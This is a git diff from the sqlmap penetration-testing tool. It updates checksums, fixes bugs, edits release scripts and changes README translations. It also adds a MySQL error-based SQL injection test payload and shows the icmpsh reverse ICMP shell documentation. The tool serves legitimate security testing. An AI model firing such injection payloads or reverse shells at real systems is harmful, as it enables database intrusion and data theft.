ff648ca28dfbc9cbbd3f3c4ceb92ccaacfd0206e580629b7d22115c50ed7eb06 plugins/dbms/oracle/enumeration.py
|
||||
3a53b87decff154355b7c43742c0979323ae9ba3b34a6225a326ec787e85ce6d plugins/dbms/oracle/filesystem.py
|
||||
f8c0c05b518dbcdb6b9a618e3fa33daefdb84bea6cb70521b7b58c7de9e6bf3a plugins/dbms/oracle/fingerprint.py
|
||||
@@ -459,9 +460,9 @@ acc41465f146d2611fca5a84bd8896bc0ccd2b032b8938357aea3e5b173a5a10 plugins/dbms/v
|
||||
3c163c8135e2ab8ed17b0000862a1b2d7cf2ec1e7d96d349ec644651cdecad49 plugins/dbms/virtuoso/syntax.py
|
||||
7ac6006e0fc6da229c37fbce39a1406022e5fcc4cac5209814fa20818b8c031a plugins/dbms/virtuoso/takeover.py
|
||||
e6dfaab13d9f98ccffdc70dd46800ca2d61519731d10a267bc82f9fb82cd504d plugins/generic/connector.py
|
||||
664be8bb4157452f2e40c4f98a359e26b559d7ef4f4148564cb8533b5ebf7d54 plugins/generic/custom.py
|
||||
22b85d8b07a5f00a9a0d61093b96accd3c5a3daf50701366feef1b5b58d4042e plugins/generic/databases.py
|
||||
37e83713dbd6564deadb7fe68478129d411de93eaf5c5e0276124248e9373025 plugins/generic/entries.py
|
||||
ef413f95c1846d37750beae90ed3e3b3a1288cfa9595c9c6f7890252a4ee3166 plugins/generic/custom.py
|
||||
3d118a7ddb1604a9f86826118cfbae4ab0b83f6e9bef9c6d1c7e77d3da6acf67 plugins/generic/databases.py
|
||||
96924a13d7bf0ed8056dc70f10593e9253750a3d83e9a9c9656c3d1527eda344 plugins/generic/entries.py
|
||||
a734d74599761cd1cf7d49c88deeb121ea57d80c2f0447e361a4e3a737154c0e plugins/generic/enumeration.py
|
||||
1c2e812096015eaef55be45d3a0bcd92b4db27eace47e36577aeff7b4246ad35 plugins/generic/filesystem.py
|
||||
05f33c9ba3897e8d75c8cf4be90eb24b08e1d7cd0fc0f74913f052c83bc1a7c1 plugins/generic/fingerprint.py
|
||||
@@ -472,11 +473,11 @@ a734d74599761cd1cf7d49c88deeb121ea57d80c2f0447e361a4e3a737154c0e plugins/generi
|
||||
fff84edc86b7d22dc01148fb10bb43d51cb9638dff21436fb94555db2a664766 plugins/generic/takeover.py
|
||||
0bc5c150e8cf4f892aba1ff15fc8938c387fb2a173b77329a0dc4cdb8b4bb4e2 plugins/generic/users.py
|
||||
99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730 plugins/__init__.py
|
||||
d5b3243c2b048aa8074d2d828f74fbf8237286c3d00fd868f1b4090c267b78ef README.md
|
||||
6cfaaf6534688cecda09433246d0a8518f98ce5cf6d6a8159f24d70502cfc14f sqlmapapi.py
|
||||
5a473c60853f54f1a4b14d79b8237f659278fe8a6b42e935ed573bf22b6d5b2c README.md
|
||||
78aafd53980096364f0c995c6283931bff505aed88fed1e7906fb06ee60e9c5b sqlmapapi.py
|
||||
168309215af7dd5b0b71070e1770e72f1cbb29a3d8025143fb8aa0b88cd56b62 sqlmapapi.yaml
|
||||
5e172e315524845fe091aa0b7b29303c92ac8f67594c6d50f026d627e415b7ed sqlmap.conf
|
||||
7800faa964d1fc06bbca856ca35bf21d68f5e044ae0bd5d7dea16d625d585adb sqlmap.py
|
||||
005b240c187586fbdb7bab247398cad881efec26b6d6a46229a635411f5f207e sqlmap.conf
|
||||
3a18b78b1aaf7236a35169db20eb21ca7d7fb907cd38dd34650f1da81c010cd6 sqlmap.py
|
||||
adda508966db26c30b11390d6483c1fa25b092942a29730e739e1e50c403a21f tamper/0eunion.py
|
||||
d38fe5ab97b401810612eae049325aa990c55143504b25cc9924810917511dee tamper/apostrophemask.py
|
||||
8de713d1534d8cda171db4ceeb9f4324bcc030bbef21ffeaf60396c6bece31e4 tamper/apostrophenullencode.py
|
||||
@@ -549,9 +550,9 @@ b4b03668061ba1a1dfc2e3a3db8ba500481da23f22b2bb1ebcbddada7479c3b0 tamper/upperca
|
||||
bd0fd06e24c3e05aecaccf5ba4c17d181e6cd35eee82c0efd6df5414fb0cb6f6 tamper/xforwardedfor.py
|
||||
55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py
|
||||
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py
|
||||
82b6daf563d8c1933a8de655e04d6c8466d3db5c583c952e450d47ccc5c7c662 thirdparty/beautifulsoup/beautifulsoup.py
|
||||
bc92179cb2785712951fef05333290abf22e5b595e0a93d0168cc05132bc5f37 thirdparty/beautifulsoup/__init__.py
|
||||
1b0f89e4713cc8cec4e4d824368a4eb9d3bdce7ddfc712326caac4feda1d7f69 thirdparty/bottle/bottle.py
|
||||
dfb8a36f58a3ae72c34d6a350830857c88ff8938fe256af585d5c9c63040c5b2 thirdparty/beautifulsoup/beautifulsoup.py
|
||||
7d62c59f787f987cbce0de5375f604da8de0ba01742842fb2b3d12fcb92fcb63 thirdparty/beautifulsoup/__init__.py
|
||||
0915f7e3d0025f81a2883cd958813470a4be661744d7fffa46848b45506b951a thirdparty/bottle/bottle.py
|
||||
9f56e761d79bfdb34304a012586cb04d16b435ef6130091a97702e559260a2f2 thirdparty/bottle/__init__.py
|
||||
0ffccae46cb3a15b117acd0790b2738a5b45417d1b2822ceac57bdff10ef3bff thirdparty/chardet/big5freq.py
|
||||
901c476dd7ad0693deef1ae56fe7bdf748a8b7ae20fde1922dddf6941eff8773 thirdparty/chardet/big5prober.py
|
||||
@@ -595,7 +596,7 @@ b29dc1d3c9ab0d707ea5fdcaf5fa89ff37831ce08b0bc46b9e04320c56a9ffb8 thirdparty/cha
|
||||
1c1ee8a91eb20f8038ace6611610673243d0f71e2b7566111698462182c7efdd thirdparty/clientform/clientform.py
|
||||
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/clientform/__init__.py
|
||||
162d2e9fe40ba919bebfba3f9ca88eab20bc3daa4124aec32d5feaf4b2ad4ced thirdparty/colorama/ansi.py
|
||||
bca8d86f2c754732435b67e9b22de0232b6c57dabeefc8afb24fbe861377a826 thirdparty/colorama/ansitowin32.py
|
||||
a7070aa13221d97e6d2df0f522b41f1876cd46cb1ddb16d44c1f304f7bab03a3 thirdparty/colorama/ansitowin32.py
|
||||
d7b5750fa3a21295c761a00716543234aefd2aa8250966a6c06de38c50634659 thirdparty/colorama/initialise.py
|
||||
f71072ad3be4f6ea642f934657922dd848dee3e93334bc1aff59463d6a57a0d5 thirdparty/colorama/__init__.py
|
||||
fd2084a132bf180dad5359e16dac8a29a73ebfd267f7c9423c814e7853060874 thirdparty/colorama/win32.py
|
||||
@@ -622,7 +623,7 @@ d1d54fc08f80148a4e2ac5eee84c8475617e8c18bfbde0dfe6894c0f868e4659 thirdparty/pyd
|
||||
1c61d71502a80f642ff34726aa287ac40c1edd8f9239ce2e094f6fded00d00d4 thirdparty/six/__init__.py
|
||||
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/socks/__init__.py
|
||||
7027e214e014eb78b7adcc1ceda5aca713a79fc4f6a0c52c9da5b3e707e6ffe9 thirdparty/socks/LICENSE
|
||||
5ac11e932896dfb7d50353dd16f717bd98cb1fb235f28e6fe8880c03655838bb thirdparty/socks/socks.py
|
||||
543217f63a4f0a7e7b4f9063058d2173099d54d010a6a4432e15a97f76456520 thirdparty/socks/socks.py
|
||||
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/termcolor/__init__.py
|
||||
b14474d467c70f5fe6cb8ed624f79d881c04fe6aeb7d406455da624fe8b3c0df thirdparty/termcolor/termcolor.py
|
||||
4db695470f664b0d7cd5e6b9f3c94c8d811c4c550f37f17ed7bdab61bc3bdefc thirdparty/wininetpton/__init__.py
|
||||
|
||||
@@ -554,6 +554,15 @@ Formats:
|
||||
</boundary>
|
||||
<!-- End of escaped column name boundaries -->
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>7</clause>
|
||||
<where>1</where>
|
||||
<ptype>3</ptype>
|
||||
<prefix> [RANDSTR1],</prefix>
|
||||
<suffix> [RANDSTR2]</suffix>
|
||||
</boundary>
|
||||
|
||||
<!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
|
||||
<boundary>
|
||||
<level>4</level>
|
||||
|
||||
@@ -221,6 +221,26 @@
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
|
||||
<stype>2</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>7</clause>
|
||||
<where>1</where>
|
||||
<vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>
|
||||
<request>
|
||||
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
|
||||
<stype>2</stype>
|
||||
|
||||
67
doc/translations/README-ckb-KU.md
Normal file
67
doc/translations/README-ckb-KU.md
Normal file
@@ -0,0 +1,67 @@
|
||||
# sqlmap 
|
||||
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
|
||||
<div dir=rtl>
|
||||
|
||||
|
||||
|
||||
بەرنامەی `sqlmap` بەرنامەیەکی تاقیکردنەوەی چوونە ژوورەوەی سەرچاوە کراوەیە کە بە شێوەیەکی ئۆتۆماتیکی بنکەدراوە کە کێشەی ئاسایشی SQL Injection یان هەیە دەدۆزێتەوە. ئەم بەرنامەیە بزوێنەرێکی بەهێزی دیاریکردنی تێدایە. هەروەها کۆمەڵێک سکریپتی بەرفراوانی هەیە کە ئاسانکاری دەکات بۆ پیشەییەکانی تاقیکردنەوەی دزەکردن(penetration tester) بۆ کارکردن لەگەڵ بنکەدراوە. لە کۆکردنەوەی زانیاری دەربارەی بانکی داتا تا دەستگەیشتن بە داتاکانی سیستەم و جێبەجێکردنی فەرمانەکان لە ڕێگەی پەیوەندی Out Of Band لە سیستەمی کارگێڕدا.
|
||||
|
||||
|
||||
سکرین شاتی ئامرازەکە
|
||||
----
|
||||
|
||||
|
||||
<div dir=ltr>
|
||||
|
||||
|
||||
|
||||

|
||||
|
||||
|
||||
<div dir=rtl>
|
||||
|
||||
بۆ بینینی [کۆمەڵێک سکرین شات و سکریپت](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) دەتوانیت سەردانی ویکیەکە بکەیت.
|
||||
|
||||
|
||||
دامەزراندن
|
||||
----
|
||||
|
||||
بۆ دابەزاندنی نوێترین وەشانی tarball، کلیک [لێرە](https://github.com/sqlmapproject/sqlmap/tarball/master) یان دابەزاندنی نوێترین وەشانی zipball بە کلیککردن لەسەر [لێرە](https://github.com/sqlmapproject/sqlmap/zipball/master) دەتوانیت ئەم کارە بکەیت.
|
||||
|
||||
باشترە بتوانیت sqlmap دابەزێنیت بە کلۆنکردنی کۆگای [Git](https://github.com/sqlmapproject/sqlmap):
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap لە دەرەوەی سندوق کاردەکات لەگەڵ [Python](https://www.python.org/download/) وەشانی **2.6**، **2.7** و **3.x** لەسەر هەر پلاتفۆرمێک.
|
||||
|
||||
چۆنیەتی بەکارهێنان
|
||||
----
|
||||
|
||||
بۆ بەدەستهێنانی لیستی بژاردە سەرەتاییەکان و سویچەکان ئەمانە بەکاربهێنە:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
بۆ بەدەستهێنانی لیستی هەموو بژاردە و سویچەکان ئەمە بەکار بێنا:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
دەتوانن نمونەی ڕانکردنێک بدۆزنەوە [لێرە](https://asciinema.org/a/46601).
|
||||
بۆ بەدەستهێنانی تێڕوانینێکی گشتی لە تواناکانی sqlmap، لیستی تایبەتمەندییە پشتگیریکراوەکان، و وەسفکردنی هەموو هەڵبژاردن و سویچەکان، لەگەڵ نموونەکان، ئامۆژگاریت دەکرێت کە ڕاوێژ بە [دەستنووسی بەکارهێنەر](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
|
||||
بەستەرەکان
|
||||
----
|
||||
|
||||
* ماڵپەڕی سەرەکی: https://sqlmap.org
|
||||
* داگرتن: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یان [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* فیدی RSS جێبەجێ دەکات: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* شوێنپێهەڵگری کێشەکان: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* ڕێنمایی بەکارهێنەر: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* پرسیارە زۆرەکان (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* X: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* دیمۆ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
||||
* وێنەی شاشە: https://github.com/sqlmapproject/sqlmap/wiki/وێنەی شاشە
|
||||
|
||||
وەرگێڕانەکان
|
||||
@@ -2,9 +2,9 @@
|
||||
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap adalah alat bantu proyek sumber terbuka yang digunakan untuk melakukan uji penetrasi, mengotomasi proses deteksi, eksploitasi kelemahan _SQL injection_ serta pengambil-alihan server basis data.
|
||||
sqlmap adalah perangkat lunak sumber terbuka yang digunakan untuk melakukan uji penetrasi, mengotomasi proses deteksi, eksploitasi kelemahan _SQL injection_ serta pengambil-alihan server basis data.
|
||||
|
||||
sqlmap dilengkapi dengan pendeteksi canggih dan fitur-fitur handal yang berguna bagi _penetration tester_. Alat ini menawarkan berbagai cara untuk mendeteksi basis data bahkan dapat mengakses sistem file dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
|
||||
sqlmap dilengkapi dengan pendeteksi canggih dan fitur-fitur handal yang berguna bagi _penetration tester_. Perangkat lunak ini menawarkan berbagai cara untuk mendeteksi basis data bahkan dapat mengakses sistem file dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
|
||||
|
||||
Tangkapan Layar
|
||||
----
|
||||
|
||||
@@ -2,15 +2,15 @@
|
||||
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap là một công cụ kiểm tra thâm nhập mã nguồn mở, nhằm tự động hóa quá trình phát hiện, khai thác lỗ hổng tiêm SQL và tiếp quản các máy chủ cơ sở dữ liệu. Nó đi kèm với
|
||||
một hệ thống phát hiện mạnh mẽ, nhiều tính năng thích hợp cho người kiểm tra thâm nhập (pentester) và một loạt các tùy chọn bao gồm phát hiện cơ sở dữ liệu, truy xuất dữ liệu từ cơ sở dữ liệu, truy cập tệp của hệ thống và thực hiện các lệnh trên hệ điều hành từ xa.
|
||||
sqlmap là một công cụ kiểm tra thâm nhập mã nguồn mở, nhằm tự động hóa quá trình phát hiện, khai thác lỗ hổng SQL injection và tiếp quản các máy chủ cơ sở dữ liệu. Công cụ này đi kèm với
|
||||
một hệ thống phát hiện mạnh mẽ, nhiều tính năng thích hợp cho người kiểm tra thâm nhập (pentester) và một loạt các tùy chọn bao gồm phát hiện, truy xuất dữ liệu từ cơ sở dữ liệu, truy cập file hệ thống và thực hiện các lệnh trên hệ điều hành từ xa.
|
||||
|
||||
Ảnh chụp màn hình
|
||||
----
|
||||
|
||||

|
||||
|
||||
Bạn có thể truy cập vào [bộ sưu tập ảnh chụp màn hình](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), chúng trình bày một số tính năng có thể tìm thấy trong wiki.
|
||||
Bạn có thể truy cập vào [bộ sưu tập ảnh chụp màn hình](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) - nơi trình bày một số tính năng có thể tìm thấy trong wiki.
|
||||
|
||||
Cài đặt
|
||||
----
|
||||
@@ -18,7 +18,7 @@ Cài đặt
|
||||
|
||||
Bạn có thể tải xuống tập tin nén tar mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc tập tin nén zip mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||
|
||||
Tốt hơn là bạn nên tải xuống sqlmap bằng cách clone với [Git](https://github.com/sqlmapproject/sqlmap):
|
||||
Tốt hơn là bạn nên tải xuống sqlmap bằng cách clone về repo [Git](https://github.com/sqlmapproject/sqlmap):
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
@@ -27,16 +27,16 @@ sqlmap hoạt động hiệu quả với [Python](https://www.python.org/downloa
|
||||
Sử dụng
|
||||
----
|
||||
|
||||
Để có được danh sách các tùy chọn cơ bản, hãy sử dụng:
|
||||
Để có được danh sách các tùy chọn cơ bản và switch, hãy chạy:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
Để có được danh sách tất cả các tùy chọn, hãy sử dụng:
|
||||
Để có được danh sách tất cả các tùy chọn và switch, hãy chạy:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Bạn có thể xem video chạy thử [tại đây](https://asciinema.org/a/46601).
|
||||
Để có cái nhìn tổng quan về các khả năng của sqlmap, danh sách các tính năng được hỗ trợ và mô tả về tất cả các tùy chọn, cùng với các ví dụ, bạn nên tham khảo [hướng dẫn sử dụng](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (Tiếng Anh).
|
||||
Bạn có thể xem video demo [tại đây](https://asciinema.org/a/46601).
|
||||
Để có cái nhìn tổng quan về sqlmap, danh sách các tính năng được hỗ trợ và mô tả về tất cả các tùy chọn, cùng với các ví dụ, bạn nên tham khảo [hướng dẫn sử dụng](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (Tiếng Anh).
|
||||
|
||||
Liên kết
|
||||
----
|
||||
@@ -44,7 +44,7 @@ Liên kết
|
||||
* Trang chủ: https://sqlmap.org
|
||||
* Tải xuống: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* Nguồn cấp dữ liệu RSS về commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Theo dõi vấn đề: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Theo dõi issue: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Hướng dẫn sử dụng: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* Các câu hỏi thường gặp (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* X: [@sqlmap](https://twitter.com/sqlmap)
|
||||
|
||||
@@ -1,45 +1,45 @@
|
||||
icmpsh - simple reverse ICMP shell
|
||||
|
||||
icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl.
|
||||
|
||||
|
||||
--- Running the Master ---
|
||||
|
||||
The master is straight forward to use. There are no extra libraries required for the C version.
|
||||
The Perl master however has the following dependencies:
|
||||
|
||||
* IO::Socket
|
||||
* NetPacket::IP
|
||||
* NetPacket::ICMP
|
||||
|
||||
|
||||
When running the master, don't forget to disable ICMP replies by the OS. For example:
|
||||
|
||||
sysctl -w net.ipv4.icmp_echo_ignore_all=1
|
||||
|
||||
If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive
|
||||
commands send from the master.
|
||||
|
||||
|
||||
--- Running the Slave ---
|
||||
|
||||
The slave comes with a few command line options as outlined below:
|
||||
|
||||
|
||||
-t host host ip address to send ping requests to. This option is mandatory!
|
||||
|
||||
-r send a single test icmp request containing the string "Test1234" and then quit.
|
||||
This is for testing the connection.
|
||||
|
||||
-d milliseconds delay between requests in milliseconds
|
||||
|
||||
-o milliseconds timeout of responses in milliseconds. If a response has not received in time,
|
||||
the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
|
||||
The counter is set back to 0 if a response was received.
|
||||
|
||||
-b num limit of blanks (unanswered icmp requests before quitting
|
||||
|
||||
-s bytes maximal data buffer size in bytes
|
||||
|
||||
|
||||
In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer.
|
||||
icmpsh - simple reverse ICMP shell
|
||||
|
||||
icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl.
|
||||
|
||||
|
||||
--- Running the Master ---
|
||||
|
||||
The master is straight forward to use. There are no extra libraries required for the C version.
|
||||
The Perl master however has the following dependencies:
|
||||
|
||||
* IO::Socket
|
||||
* NetPacket::IP
|
||||
* NetPacket::ICMP
|
||||
|
||||
|
||||
When running the master, don't forget to disable ICMP replies by the OS. For example:
|
||||
|
||||
sysctl -w net.ipv4.icmp_echo_ignore_all=1
|
||||
|
||||
If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive
|
||||
commands send from the master.
|
||||
|
||||
|
||||
--- Running the Slave ---
|
||||
|
||||
The slave comes with a few command line options as outlined below:
|
||||
|
||||
|
||||
-t host host ip address to send ping requests to. This option is mandatory!
|
||||
|
||||
-r send a single test icmp request containing the string "Test1234" and then quit.
|
||||
This is for testing the connection.
|
||||
|
||||
-d milliseconds delay between requests in milliseconds
|
||||
|
||||
-o milliseconds timeout of responses in milliseconds. If a response has not received in time,
|
||||
the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
|
||||
The counter is set back to 0 if a response was received.
|
||||
|
||||
-b num limit of blanks (unanswered icmp requests before quitting
|
||||
|
||||
-s bytes maximal data buffer size in bytes
|
||||
|
||||
|
||||
In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer.
|
||||
|
||||
@@ -38,7 +38,8 @@ setup(
|
||||
},
|
||||
download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip',
|
||||
license='GNU General Public License v2 (GPLv2)',
|
||||
packages=find_packages(),
|
||||
packages=['sqlmap'],
|
||||
package_dir={'sqlmap':'sqlmap'},
|
||||
include_package_data=True,
|
||||
zip_safe=False,
|
||||
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
|
||||
@@ -176,5 +177,7 @@ EOF
|
||||
sed -i "s/^VERSION =.*/VERSION = \"$VERSION\"/g" sqlmap/lib/core/settings.py
|
||||
sed -i "s/^TYPE =.*/TYPE = \"$TYPE\"/g" sqlmap/lib/core/settings.py
|
||||
for file in $(find sqlmap -type f | grep -v -E "\.(git|yml)"); do echo include $file >> MANIFEST.in; done
|
||||
python setup.py sdist upload
|
||||
python setup.py sdist bdist_wheel
|
||||
twine check dist/*
|
||||
twine upload --config-file=~/.pypirc dist/*
|
||||
rm -rf $TMP_DIR
|
||||
|
||||
@@ -581,7 +581,7 @@ def checkSqlInjection(place, parameter, value):
|
||||
|
||||
if injectable:
|
||||
if kb.pageStable and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
|
||||
if all((falseCode, trueCode)) and falseCode != trueCode:
|
||||
if all((falseCode, trueCode)) and falseCode != trueCode and trueCode != kb.heuristicCode:
|
||||
suggestion = conf.code = trueCode
|
||||
|
||||
infoMsg = "%sparameter '%s' appears to be '%s' injectable (with --code=%d)" % ("%s " % paramType if paramType != parameter else "", parameter, title, conf.code)
|
||||
@@ -1050,9 +1050,10 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||
|
||||
payload = "%s%s%s" % (prefix, randStr, suffix)
|
||||
payload = agent.payload(place, parameter, newValue=payload)
|
||||
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
page, _, code = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
|
||||
kb.heuristicPage = page
|
||||
kb.heuristicCode = code
|
||||
kb.heuristicMode = False
|
||||
|
||||
parseFilePaths(page)
|
||||
|
||||
@@ -69,7 +69,7 @@ from lib.core.settings import ASP_NET_CONTROL_REGEX
|
||||
from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
|
||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||
from lib.core.settings import EMPTY_FORM_FIELDS_REGEX
|
||||
from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
|
||||
from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_REGEX
|
||||
from lib.core.settings import HOST_ALIASES
|
||||
from lib.core.settings import IGNORE_PARAMETERS
|
||||
from lib.core.settings import LOW_TEXT_PERCENT
|
||||
@@ -563,7 +563,7 @@ def start():
|
||||
logger.info(infoMsg)
|
||||
|
||||
# Ignore session-like parameters for --level < 4
|
||||
elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or any(_ in parameter.lower() for _ in CSRF_TOKEN_PARAMETER_INFIXES) or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
|
||||
elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or any(_ in parameter.lower() for _ in CSRF_TOKEN_PARAMETER_INFIXES) or re.search(GOOGLE_ANALYTICS_COOKIE_REGEX, parameter)):
|
||||
testSqlInj = False
|
||||
|
||||
infoMsg = "ignoring %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
|
||||
|
||||
@@ -65,6 +65,8 @@ class BigArray(list):
|
||||
>>> _ = _ + [1]
|
||||
>>> _[-1]
|
||||
1
|
||||
>>> len([_ for _ in BigArray(xrange(100000))])
|
||||
100000
|
||||
"""
|
||||
|
||||
def __init__(self, items=None):
|
||||
@@ -198,7 +200,10 @@ class BigArray(list):
|
||||
|
||||
def __iter__(self):
|
||||
for i in xrange(len(self)):
|
||||
yield self[i]
|
||||
try:
|
||||
yield self[i]
|
||||
except IndexError:
|
||||
break
|
||||
|
||||
def __len__(self):
|
||||
return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * self.chunk_length + len(self.chunks[-1])
|
||||
|
||||
@@ -129,13 +129,14 @@ from lib.core.settings import FORM_SEARCH_REGEX
|
||||
from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES
|
||||
from lib.core.settings import GIT_PAGE
|
||||
from lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN
|
||||
from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
|
||||
from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_REGEX
|
||||
from lib.core.settings import HASHDB_MILESTONE_VALUE
|
||||
from lib.core.settings import HOST_ALIASES
|
||||
from lib.core.settings import HTTP_CHUNKED_SPLIT_KEYWORDS
|
||||
from lib.core.settings import IGNORE_PARAMETERS
|
||||
from lib.core.settings import IGNORE_SAVE_OPTIONS
|
||||
from lib.core.settings import INFERENCE_UNKNOWN_CHAR
|
||||
from lib.core.settings import INJECT_HERE_REGEX
|
||||
from lib.core.settings import IP_ADDRESS_REGEX
|
||||
from lib.core.settings import ISSUES_PAGE
|
||||
from lib.core.settings import IS_TTY
|
||||
@@ -661,7 +662,7 @@ def paramToDict(place, parameters=None):
|
||||
|
||||
if not conf.multipleTargets and not (conf.csrfToken and re.search(conf.csrfToken, parameter, re.I)):
|
||||
_ = urldecode(testableParameters[parameter], convall=True)
|
||||
if (_.endswith("'") and _.count("'") == 1 or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _)) and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX):
|
||||
if (_.endswith("'") and _.count("'") == 1 or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _)) and not re.search(GOOGLE_ANALYTICS_COOKIE_REGEX, parameter):
|
||||
warnMsg = "it appears that you have provided tainted parameter values "
|
||||
warnMsg += "('%s') with most likely leftover " % element
|
||||
warnMsg += "chars/statements from manual SQL injection test(s). "
|
||||
@@ -1333,7 +1334,10 @@ def isZipFile(filename):
|
||||
|
||||
checkFile(filename)
|
||||
|
||||
return openFile(filename, "rb", encoding=None).read(len(ZIP_HEADER)) == ZIP_HEADER
|
||||
with openFile(filename, "rb", encoding=None) as f:
|
||||
header = f.read(len(ZIP_HEADER))
|
||||
|
||||
return header == ZIP_HEADER
|
||||
|
||||
def isDigit(value):
|
||||
"""
|
||||
@@ -2533,21 +2537,22 @@ def initCommonOutputs():
|
||||
kb.commonOutputs = {}
